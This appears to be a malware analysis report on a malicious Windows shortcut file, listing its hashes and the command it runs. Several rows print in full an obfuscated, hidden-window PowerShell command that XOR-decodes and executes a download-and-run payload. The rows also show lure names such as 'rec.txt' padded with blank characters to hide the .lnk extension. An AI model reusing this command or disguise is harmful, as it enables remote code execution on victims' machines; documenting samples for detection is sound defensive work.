|
Hash | Hash Value |
|---|---|
| MD5 | 59de41d26e1b54cddd0fbad3cb357d75
|
| Sha1 | 2822dd2f881a0950c7404db59ddd683842b0ef5d
|
| Sha256 | 63ac6f81355d2fbc833c95e7173526f7192fa9bfa3c0e77747d924b89851b683
|
| Sha384 | 09a6ba1fac9c388c1a1f78cbf8ca9ce53f0c33881fe65b5d24e5f497186c6fa83a8a9f036e1f9c4866540bbf099290a1
|
| Sha512 | 646c10cf523359174feae25a40519c44aaeda14784ba5161496182f434aca57b394d9bad66ab8589b5d0030c9cbbd4e80ddebc7b7e8b1c34956e861e227a1145
|
| SSDeep | 48:ZSqXcSxwO6UDDJykzmZSo6oLTGDuMs8xbuPqqU4nAr1btJZit:ZSs2U3JVzm6OmTfxKPQtpbXZit
|
| TLSH | 545108017A87BF07E546BAD3450E2507BB09029E78B2491366E135C42A0F86605EB2DA
|
|
Name | Value |
|---|---|
| LNK: Command Execution | powershell.exe -w h $k=145;iex(-join([byte[]]@(248,244,233,185,248,227,252,185,188,251,254,248,255,177,182,161,243,163,165,240,244,242,245,161,160,244,245,190,245,190,253,254,253,191,226,244,253,248,247,233,244,249,190,190,171,226,225,229,229,249,182,202,188,160,191,191,188,162,164,204,184,184)|%{[char]($_-bxor$k)})) |
| LNK: Command Execution | powershell.exe -w h $k=145;iex(-join([byte[]]@(248,244,233,185,248,227,252,185,188,251,254,248,255,177,182,161,243,163,165,240,244,242,245,161,160,244,245,190,245,190,253,254,253,191,226,244,253,248,247,233,244,249,190,190,171,226,225,229,229,249,182,202,188,160,191,191,188,162,164,204,184,184)|%{[char]($_-bxor$k)})) |
|
Name | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe -w h $k=145;iex(-join([byte[]]@(248,244,233,185,248,227,252,185,188,251,254,248,255,177,182,161,243,163,165,240,244,242,245,161,160,244,245,190,245,190,253,254,253,191,226,244,253,248,247,233,244,249,190,190,171,226,225,229,229,249,182,202,188,160,191,191,188,162,164,204,184,184)|%{[char]($_-bxor$k)})) Malicious |
59de41d26e1b54cddd0fbad3cb357d75 > rec.txt⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.lnk |
| LNK: Command Execution | powershell.exe -w h $k=145;iex(-join([byte[]]@(248,244,233,185,248,227,252,185,188,251,254,248,255,177,182,161,243,163,165,240,244,242,245,161,160,244,245,190,245,190,253,254,253,191,226,244,253,248,247,233,244,249,190,190,171,226,225,229,229,249,182,202,188,160,191,191,188,162,164,204,184,184)|%{[char]($_-bxor$k)})) Malicious |
59de41d26e1b54cddd0fbad3cb357d75 > code.txt⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.lnk |